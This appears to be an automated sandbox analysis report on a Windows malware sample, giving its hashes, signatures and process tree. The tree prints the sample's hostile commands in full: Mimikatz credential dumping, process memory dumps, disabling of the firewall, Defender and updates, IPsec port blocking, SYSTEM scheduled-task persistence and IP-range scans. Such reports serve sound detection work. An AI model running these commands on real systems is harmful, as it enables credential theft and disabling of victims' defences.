Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2024 08:15

General

  • Target

    3605ab49298c58559971af24d30a5d45fdbc53a969fe11bf87f687ba5aa3a87fN.exe

  • Size

    9.7MB

  • MD5

    72d5c671ebf90683f456b6bfedff60f0

  • SHA1

    e13b7cc46e7821e05d0050b0b1c280ab174343bd

  • SHA256

    3605ab49298c58559971af24d30a5d45fdbc53a969fe11bf87f687ba5aa3a87f

  • SHA512

    59fb8672cc98aac9eabbb92dad4c949deb868568b66bd5177efca25d5b7ade5a876fec5b1553658f0d5f638848dcee288adf7282efde45fd6579dff46869dd19

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (3615) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 7 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 33 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2124
      • C:\Windows\TEMP\ciubbeybg\auelfz.exe
        "C:\Windows\TEMP\ciubbeybg\auelfz.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2828
    • C:\Users\Admin\AppData\Local\Temp\3605ab49298c58559971af24d30a5d45fdbc53a969fe11bf87f687ba5aa3a87fN.exe
      "C:\Users\Admin\AppData\Local\Temp\3605ab49298c58559971af24d30a5d45fdbc53a969fe11bf87f687ba5aa3a87fN.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4792
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tiagluue\wyzubbc.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:5032
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:744
        • C:\Windows\tiagluue\wyzubbc.exe
          C:\Windows\tiagluue\wyzubbc.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2404
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4464,i,1330210614411927383,9239043499051775691,262144 --variations-seed-version --mojo-platform-channel-handle=4360 /prefetch:8
      1⤵
        PID:992
      • C:\Windows\tiagluue\wyzubbc.exe
        C:\Windows\tiagluue\wyzubbc.exe
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Event Triggered Execution: Image File Execution Options Injection
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3448
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1036
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:404
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4088
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3616
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1856
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:4880
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3972
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2828
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3004
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4924
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\gybaengyl\abausqena\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:556
            • C:\Windows\gybaengyl\abausqena\wpcap.exe
              C:\Windows\gybaengyl\abausqena\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:4192
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4204
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4900
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2404
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                    PID:2032
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4844
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1036
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2744
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:372
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4332
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                  PID:4044
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1516
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3948
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                    PID:2756
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:1628
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\gybaengyl\abausqena\byneybtbu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gybaengyl\abausqena\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:5028
                  • C:\Windows\gybaengyl\abausqena\byneybtbu.exe
                    C:\Windows\gybaengyl\abausqena\byneybtbu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gybaengyl\abausqena\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:2484
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\gybaengyl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gybaengyl\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:1632
                  • C:\Windows\gybaengyl\Corporate\vfshost.exe
                    C:\Windows\gybaengyl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3220
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hcacbbgbt" /ru system /tr "cmd /c C:\Windows\ime\wyzubbc.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3580
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4580
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "hcacbbgbt" /ru system /tr "cmd /c C:\Windows\ime\wyzubbc.exe"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:2024
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yclstguhe" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:816
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4676
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "yclstguhe" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3972
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dyiyeenct" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2592
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2404
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "dyiyeenct" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3256
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3200
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1236
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1592
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1504
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4600
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4044
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2344
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2828
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1844
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:116
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1232
                • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                  C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 800 C:\Windows\TEMP\gybaengyl\800.dmp
                  2⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2964
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4868
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2236
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                      PID:2908
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2604
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1856
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:968
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3616
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2844
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3384
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                        PID:2008
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4004
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop WinDefend
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4844
                      • C:\Windows\SysWOW64\net.exe
                        net stop WinDefend
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4412
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4044
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3912
                      • C:\Windows\SysWOW64\net.exe
                        net stop wuauserv
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1064
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1768
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1632
                      • C:\Windows\SysWOW64\sc.exe
                        sc config MpsSvc start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:4192
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config SharedAccess start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2364
                      • C:\Windows\SysWOW64\sc.exe
                        sc config SharedAccess start= disabled
                        3⤵
                        • Launches sc.exe
                        PID:4332
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config WinDefend start= disabled
                      2⤵
                        PID:4356
                        • C:\Windows\SysWOW64\sc.exe
                          sc config WinDefend start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:3600
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config wuauserv start= disabled
                        2⤵
                          PID:4940
                          • C:\Windows\SysWOW64\sc.exe
                            sc config wuauserv start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:3664
                        • C:\Windows\TEMP\xohudmc.exe
                          C:\Windows\TEMP\xohudmc.exe
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • Suspicious use of SetWindowsHookEx
                          PID:3208
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 316 C:\Windows\TEMP\gybaengyl\316.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2704
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2124 C:\Windows\TEMP\gybaengyl\2124.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3440
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2608 C:\Windows\TEMP\gybaengyl\2608.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2236
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2936 C:\Windows\TEMP\gybaengyl\2936.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2092
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3016 C:\Windows\TEMP\gybaengyl\3016.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1452
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2168 C:\Windows\TEMP\gybaengyl\2168.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4004
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3804 C:\Windows\TEMP\gybaengyl\3804.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1440
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3896 C:\Windows\TEMP\gybaengyl\3896.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1916
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3960 C:\Windows\TEMP\gybaengyl\3960.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4900
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 4056 C:\Windows\TEMP\gybaengyl\4056.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3580
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3156 C:\Windows\TEMP\gybaengyl\3156.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1264
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2716 C:\Windows\TEMP\gybaengyl\2716.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5088
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 4576 C:\Windows\TEMP\gybaengyl\4576.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1452
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3192 C:\Windows\TEMP\gybaengyl\3192.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3500
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 840 C:\Windows\TEMP\gybaengyl\840.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3224
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2012 C:\Windows\TEMP\gybaengyl\2012.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5004
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 964 C:\Windows\TEMP\gybaengyl\964.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3972
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c C:\Windows\gybaengyl\abausqena\scan.bat
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:3644
                          • C:\Windows\gybaengyl\abausqena\slunhablh.exe
                            slunhablh.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
                            3⤵
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            PID:4428
                        • C:\Windows\TEMP\gybaengyl\sibyhtagb.exe
                          C:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3436 C:\Windows\TEMP\gybaengyl\3436.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6076
                      • C:\Windows\SysWOW64\ogmqgi.exe
                        C:\Windows\SysWOW64\ogmqgi.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:1060
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\wyzubbc.exe
                        1⤵
                          PID:2480
                          • C:\Windows\ime\wyzubbc.exe
                            C:\Windows\ime\wyzubbc.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetWindowsHookEx
                            PID:1344
                        • C:\Windows\system32\cmd.EXE
                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F
                          1⤵
                            PID:2636
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              2⤵
                                PID:2600
                              • C:\Windows\system32\cacls.exe
                                cacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F
                                2⤵
                                  PID:3276
                              • C:\Windows\system32\cmd.EXE
                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F
                                1⤵
                                  PID:2368
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    2⤵
                                      PID:2156
                                    • C:\Windows\system32\cacls.exe
                                      cacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F
                                      2⤵
                                        PID:2756

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Windows\SysWOW64\Packet.dll

                                      Filesize

                                      95KB

                                      MD5

                                      86316be34481c1ed5b792169312673fd

                                      SHA1

                                      6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                      SHA256

                                      49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                      SHA512

                                      3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

